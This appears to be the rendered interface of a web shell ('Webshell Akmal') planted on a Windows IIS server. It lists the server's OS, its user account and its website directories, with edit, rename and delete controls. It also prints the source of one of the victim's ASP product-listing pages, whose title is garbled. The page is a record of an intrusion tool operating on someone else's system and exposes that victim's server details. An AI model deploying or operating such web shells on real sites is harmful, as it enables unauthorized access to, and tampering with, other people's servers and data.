Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>�ޱ����ĵ�</title> </head> <body> <table class="mc_table"> <tr> <td> <% set fs=Server.CreateObject("Scripting.FileSystemObject") Pathh=Server.MapPath("WebProductListing") Set f=fs.OpenTextFile(pathh, 1) do while f.AtEndOfStream = false DD=trim(f.ReadLine) if left(DD,1)="@" then Temp=split(DD,"|") productNum=trim(Temp(1)) productName=trim(Temp(2)) %> <input type="checkbox" name="Checkbox" value="<%=productNum%>" /><%=productNum%>:<%=productName%> <% end if loop f.Close Set f=Nothing %> </td> </tr> </table> </body> </html>